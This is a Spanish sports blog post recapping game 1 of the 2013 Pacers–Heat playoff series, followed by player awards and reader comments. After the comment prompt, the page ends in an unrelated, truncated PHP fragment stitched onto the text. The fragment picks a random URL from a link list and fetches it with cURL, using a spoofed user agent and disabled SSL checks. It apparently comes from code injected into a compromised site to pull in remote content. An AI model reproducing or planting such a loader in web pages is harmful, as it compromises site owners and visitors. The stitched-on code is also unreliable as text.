La Crónica: Lebron James salva a los Heat

23 de May de 2013 por Simon

Muchos se ha hablado en estos días sobres las posibilidades reales de estos Pacers ante los Heat y atendiendo al partido de ayer parece que vamos a tener una serie larga y dura. Fue un grandísimo partido que tuvo hasta 18 empates e idéntico número de cambios de líder en el marcador y mucha, muchísima emoción con un final trepidante. Miami Heat necesitó de una prórroga y una bandeja sobre la bocina de Lebron James para llevarse la primera victoria al zurrón (102-103).

El partido comenzó con ambos equipos muy imprecisos, con un nivel de ansiedad altísimo sobre todo por parte de los Pacers que cometieron sólo en este primer cuarto hasta 7 pérdidas de balón. A pesar de este dato el partido se mantuvo igualado debido al buen desempeño de la pareja interior de Indiana y a que Miami, con 6 pérdidas, no se quedó atrás a la hora de perder balones. Los jugadores de Indiana comenzaron el partido muy nerviosos y por momentos distraídos, permitiendo algunas canastas fáciles, fruto de las pérdidas y algunos despistes. El primer cuarto fue una simple toma de contacto, el juego estaba todavía bastante vivo y ambos equipos calibrando al rival.

En el segundo cuarto ambos equipos siguieron perdiendo el balón a un ritmo alto aunque la superioridad  de Indiana cerca del aro los seguía manteniendo con pequeñas ventajas en el marcador.  Un gran David West  conseguía guiar el ataque de su equipo con solvencia y un mejor control de la bola permitió a los de Frank Vogel lograr una pequeña renta de 7 puntos que fue la mayor diferencia de la que gozó cualquiera de los 2 equipos. Este cuarto nos dio una idea de lo que son capaces estos Pacers si cuidan el balón y consiguieron parar durante varios minutos el ataque de Miami golpeándoles una y otra vez dentro de la zona.

El inicio del tercer cuarto no pudo ser más nefasto para Indiana. De salida perdieron el balón tres veces casi seguidas, lo que aprovechó Miami para recortar la pequeña distancia del marcador y ponerse por delante. Tras este mal inicio de cuarto y un amago de marcharse por parte de Miami, Indiana volvía a limitar sus pérdidas y con ello lograba mantener el partido igualado con un Paul George desaparecido hasta el momento pero que poco a poco iba entrando en el partido. 

Miami llegó al último cuarto un punto por debajo. En este período el intercambio de canastas y golpes fue simplemente precioso con múltiples empates y alternancias en el marcador. Las primeras alarmas para Indiana saltaron cuando Miami se puso 4 puntos arriba a falta de dos minutos pero lejos de precipitarse los Pacers continuaron a lo suyo y West igualó el partido a falta de apenas 50 segundos. Dwyane Wade puso por delante a los Heat y George perdió un balón que parecía sentenciar el partido para Miami. En el siguiente ataque, Ray Allen dispuso de tiros libres para poner a su equipo a dos jugadas de distancia pero falló el primero lo que dio opciones a Indiana de forzar la prórroga. Tras un ataque bien defendido por parte de Miami, a Paul George no le quedó más remedio que lanzar un triple desde su casa. Esta vez salió cara, el balón entró y el partido se marchaba a la prórroga tras un final espectacular de tiempo regular.

En la prórroga el partido continuó por la misma senda por la que había caminado durante los 48 minutos de juego. Las primeras ventajas de la prórroga las llegó a tener Indiana aunque un  2+1 de Bosh y una penetración de Lebron pusieron a Miami por delante a falta de 10 segundos aunque Indiana tenía bola para ganar o empatar el partido. Al igual que en el final del tiempo regular, un mal pase de Paul George hizo que Indiana perdiera el balón de manera tonta y nuevamente parecía que el partido había acabado. Nada más lejos de la realidad. George Hill se rehízo y consiguió arrebatar el balón a Norris Cole y pasarlo a George que lanzó un triple a la desesperada que fue objeto de falta por parte de Wade. Paul George disponía de 3 tiros para ponerse por delante a tan sólo dos segundos del final. El joven alero hizo gala de serenidad y anotó los tres tiros libres para poner el 102-101 en el marcador. En el último ataque, y con Hibbert en el banquillo, James, tras recibir el balón, se fue directo hacia el aro y sin oposición anotó una bandeja fácil que daba la victoria a Miami Heat. Roy Hibbert  fue protagonista indirecto en esta última jugada pues su no presencia está siendo discutida por casi todos los analistas. A Frank Vogel le llueven palos.

PREMIOS

MVP: En la pista del rey manda el Rey. Lebron James consiguió un nuevo triple-doble (el noveno de los playoffs) con 30 puntos, 10 rebotes y 10 asistencias pero por encima de todo dejó para la historia una bandeja sobre la bocina tras un gran movimiento que dio la victoria a los Heat en la prórroga.

Sorpresa: Simplemente brutal Chris Andersen. 16 puntos con un 7 de 7 en tiros de campo, 5 rebotes y 3 tapones. Todo en 18 minutos.

Decepción: Shane Battier y Ray Allen no tuvieron el día de cara al aro. El primero falló los 4 tiros que intentó (todos de 3, por supuesto) y el segundo sólo anotó 1 de sus 8 tiros.

Esfuerzo en vano: 27 puntos, 4 rebotes, 5 asistencia, un triple desde 8 metros que fuerza la prórroga, 3 tiros libres anotados consecutivamente a falta de 2 segundos para el final… La canasta final de Lebron no ha de empeñar lo que fue un gran partido de Paul George. David West también cuajó un gran partido con 26 puntos aunque fue de más a menos durante el encuentro.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Buenas

    Creo que Indiana defiende mal la ultima jugada del partido en la que James anota la canasta de la victoria para los Heat. En mi opinión le ponen bastante fáciles las cosas a Lebron para que pueda entrar a canasta. Quedando menos de 3 segundos, supongo que los Pacers esperaban que el jugador que recibiera el balón lanzara inmediatamente. Aun así no quiero desmerecer la victoria de los Heat.

      Citar

  2. rumbero dice:
    #2

    Gran crónica Simón. La verdad es que quitando el sinfín de pérdidas sobretodo al inicio que han tenido los dos equipos ha sido un auténtico partidazo, posiblemente el mejor que hemos visto en PO (quitando el final del ya mítico Game4 del Nets-Bulls).

    Con Lebron así pues ya sabemos como suelen acabar los partidos para Miami, pero aún así a poco que Indiana deje perder tantos balones sabiendo como penalizan y siga en esta línea pinta a serie larga. Ojalá!

    Y la famosa última jugada…que queréis que os diga. Con Hibbert bajo el aro esa bandejita no la mete así de fácil pero con los cinco que tenía Miami en pista y el tiempo que quedaba era como para pensar que podían buscar un tiro abierto rápido… o no cuando tienes a James en tu equipo? En cualquier caso ahí George se queda clavado, Young llega demasiado tarde y Lebron es el más listo/bueno de la clase

      Citar

  3. rumbero dice:
    #3

    Y mini punto para Riley por traerse a Birdman. Pero que bien les viene

      Citar

  4. Denise dice:
    #4

    ¿Cómo es posible que el base suplente de Miami coja 4 rebotes y Bosh solo coja 2 en 36 minutos? Mientrás el Big 3 de anillos, mejor no tocar, pero si no consiguen este año el anillo, me pensaría seriamente traspasar a Bosh e inclusive a Wade.
    A mi el Bosh de Toronto me molaba, pero ultimamente ha involucionado y va para atrás como los cangrejos.

      Citar

  5. GreenPride dice:
    #5

    Partidazo para empezar las series. Para mí el mejor partido de estos PO (sí, mejor que el Warriors-Spurs de las 2 prórrogas).
    Para empezar decir que los Pacers han conseguido que se juegue a lo que ellos quieren. Han ralentizado el partido y a pesar de sus pérdidas han conseguido que los Heat no puedan correr y entrar en el ritmo que a ellos les interesa. Durante gran parte del partido la intimadación de Hibbert ha cerrado bastante el aro a las bandejas de Wade y LeBron aunque ello les haya costado conceder rebotes ofensivos y canastas en pase sobre todo por parte de un gran Birdman Andersen que ha estado fenomenal.
    Mientras los Pacers han hecho valer su juego inside-out, buscando siempre balones por dentro a Hibbert , West e incluso Hansbrough que han anotado y hecho sufrir muchísimo a la defensa de los Heat. Además han aprovechado la falta de taponadores o intimidadores de los Heat para penetrar muchísimo.
    Y luego el hombre del partido…. y para mí no es LeBron. El hombre del partido ha sido Paul George ya que ha hecho todas las jugadas decisivas para bien y para mal. Al final del partido cogió la responsabilidad haciendo varias grandes jugadas que llevaron a los Pacers a la prórroga a pesar de un pase que un pase malo suyo les dejó en puertas de perder si un nefasto Ray Allen hubiera metido los tiros libre. Luego lo arregló y de qué manera con un triplazo sobre la bocina que mandaba el partido a la prórroga. Ahí Indiana tuvo el partido pero un descuido en un rebote le hizo perder la ventaja. Aún así de nuevo tras un mal pase de George baón que recupera milagrosamente Hill y triple con falta que George convierte en tres tiros libres anotados que ponían uno arriba a su equipo a 2 segundos. Gran sangre fría del joven alero en estos libres. Y con ese tiempo la jugada que dará que hablar. Vogel cree que los Heat buscarán un tiro abierto y que no hay tiempo de penetrar y quita a Hibbert. Discutible pero podría estar bien, pero el que se equivoca mucho es George que en vez de forzar a LeBron a un tiro lejano le encima demasiado rápido y le deja el camino totalmente libre a un aro sin pivot para defenderlo. Si no tienes a nadie debajo hay que cerrar primero el camino al aro y luego intentar que el tiro sea lo más difícil posible. Yo sinceramente habría mantenido a Hibbert en cancha sobre Bosh pues no creo que hubiera tiempo para doblar la bola y que Bosh la metiera desde 4 o 5 metros.
    Fenomenal primer partido, veremos si los Pacers encajan bien el golpe y siguen luchando a este nivel. El camino está trazado para ellos, defender a muerte, intentar no perder balones y ganar por más margen el rebote y seguir con el ritmo lento metiéndo balones dentro. Por Miami pueden decir que en un partido made in Pacers éstos lo les han ganado y que a poco que sus tiradores estén mejor pueden abrir más espacios para LeBron y Wade.

      Citar

  6. rumbero dice:
    #6

    Denise:
    ¿Cómo es posible que el base suplente de Miami coja 4 rebotes y Bosh solo coja 2 en 36 minutos? Mientrás el Big 3 de anillos, mejor no tocar, pero si no consiguen este año el anillo, me pensaría seriamente traspasar a Bosh e inclusive a Wade.
    A mi el Bosh de Toronto me molaba, pero ultimamente ha involucionado y va para atrás como los cangrejos.

    Uno de ellos clave eso sí! 😀
    No soy ningún fan de Bosh pero el papel que tiene en Miami no tiene nada que ver con el que le daban en Toronto y aún así es un recurso ofensivo bastante importante para ellos en determinados momentos, otra cosa es cuestionar la pasta que se lleva por ello. El tio las pasa (y las va a pasar) muy canutas cuando le toca pegarse con Hibbert y suerte tiene que este no sea ningun Olajuwon en cuanto a recursos porque entonces la historia seguramente sería otra como ya hemos comentado otras veces por aquí.
    En cuanto al Big Three ojo que con el 80-80 todos los puntos que mete Miami (exceptuando un par de tiros libre de Andersen creo) son suyos.

      Citar

  7. Esteban dice:
    #7

    muchisismas cosas dejo este partido madre mia

    se decia antes y es verdad, el HEAT es mejor equipo que indiana no hay nada que hacerle, los Pacers jugaron al maximo de sus posobilidades, contaron con dos mkilagros de George y ni asi pudieron ganar el juego

    indiana logro mantener el intercambio de puntos con miami de manera increible, alguna jugadita de george y cada vez que las cosas se ponian feas ensero habia un tirito corto de hibbert o uno largo de west

    miami gano claramente la segunda mitad y los pacers eviodenciaron que cuando haya que tomar el ultimo disparo van a tener enormes problemas, el triple de 10 metros de george y la falta de wade fueron guiños del destino, pero sacando esas dos jugadas, miami tenia el partido ganado

    eso si, lo gano en el ultimo minuto, pero da la impresion que llegando igualados al ultimo minuto, siempre ganra miami

      Citar

  8. Esteban dice:
    #8

    sobre la defensa de George en la ultiam jugada, tengamos en cuenta que es un chaval en su tercer año en la liga, frente a un 4 veces MVP, el mejor alero de todos los tiempos y habra que ver si puede ponerse a la altura de jordan

    al final el juego me dio la misma sencacion que en el 98 con the last shoot, no importa cuando se esfuerze el rival de jordan/lebron, de alguna forma casi imposible ganran el juego y hasta lo haran parecer facil

      Citar

  9. Esteban dice:
    #9

    sobre la ultima defensa, ya he leido en muchos sitios consejos para lo que debiera hacer SPOLSTRA y lo hizo en los momentos mas candentes, esto es, si no tiene un gigante para competir con HIbbert, jugar sin grandes y obligar a VOGEL a sentarlo o esperar que hibbert pueda correr a bosh o al mismo james (si lo pone como el hombre grande del equipo), cosa que no sucedera

    sobre andersen, indiana debera hacer algunos acomples en sus ayudas, puesto que cuando pentra un heat, saltan todos a molestarlo y taponarlo, cosa que resulto de modo excelente, pero queda muy descuidado el hombre de hibbert, en este caso andersen, si lebron en lugar de lanzar la bandeja la entrega a andersen, es volcada seguro y asi sucedio, y si lebron falla la bandeja (paso seguido) hibbert salta a ayudar, andersen queda solito para el rebote ofensivo, a ajustar tuercas alli

      Citar

  10. Laker1624 dice:
    #10

    Esteban:
    sobre la defensa de George en la ultiam jugada, tengamos en cuenta que es un chaval en su tercer año en la liga, frente a un 4 veces MVP, el mejor alero de todos los tiempos y habra que ver si puede ponerse a la altura de jordan

    al final el juego me dio la misma sencacion que en el 98 con the last shoot, no importa cuando se esfuerze el rival de jordan/lebron, de alguna forma casi imposible ganran el juego y hasta lo haran parecer facil

    Solo decir que en mi opinión es muy probable que James acabe siendo el mejor alero de la historia, pero no creo que ahora mismo se pueda considerar el mejor 3 de todos los tiempos. Pienso que los 3 campeonatos (si no recuerdo mal) conseguidos por Bird le sitúan un peldaño por encima de Lebron. Aunque estoy convencido de que James acabara siendo el mejor jugador de la historia en su posición.

      Citar

  11. Simon dice:
    #11

    Ahora para callarme la boca Miami ganará la serie 4-1… pero la sensación que me han dejado estos dos partidos es que realmente Indiana si que puede vencer a Miami… Estan jugando muy duro y Hibbert está realmente enchufado. A ver cómo sale la eliminatoria de Indiana… pero ahora mismo diría que está al 50% y eso es mucho más de lo que habría esperado para Indiana en cualquier escenario.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>